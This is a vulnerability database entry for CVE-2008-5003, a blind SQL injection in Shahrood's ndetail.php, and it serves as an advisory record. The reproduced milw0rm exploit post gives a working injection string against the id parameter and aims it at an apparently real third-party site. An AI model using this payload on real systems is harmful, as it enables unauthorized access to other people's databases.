Shahrood 'ndetail.php' SQL Injection Vulnerability

Vulnerability ID: 1116586    Vulnerability type: SQL injection
Published: 2008-11-01    Updated: 2008-11-10
CVE ID: CVE-2008-5003    CNNVD-ID: CNNVD-200811-157
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/6934
https://www.securityfocus.com/bid/80817
https://cxsecurity.com/issue/WLB-2008110090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-157
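|Vulnerability details
ndetail.php in Shahrood contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the id parameter.
|Exploit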
========================================================

==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL    : x9j@hotmail.com

==> HomE    :  www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://www.shahrood.net/

==> ExplO!te :

==> www.TarGeT.com/ndetail.php?id=[SQL]
 
==> Example :

==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM

=========================================================

# milw0rm.com [2008-11-01]
|Affected products
Shahrood Shahrood 0
|References

Source: XF
Name: shahrood-ndetail-sql-injection(46295)
Link: http://xforce.iss.net/xforce/xfdb/46295
Source: MILW0RM
Name: 6934
Link: http://www.milw0rm.com/exploits/6934
Source: VUPEN
Name: ADV-2008-2996
Link: http://www.frsirt.com/english/advisories/2008/2996
Source: SREASON
Name: 4569
Link: http://securityreason.com/securityalert/4569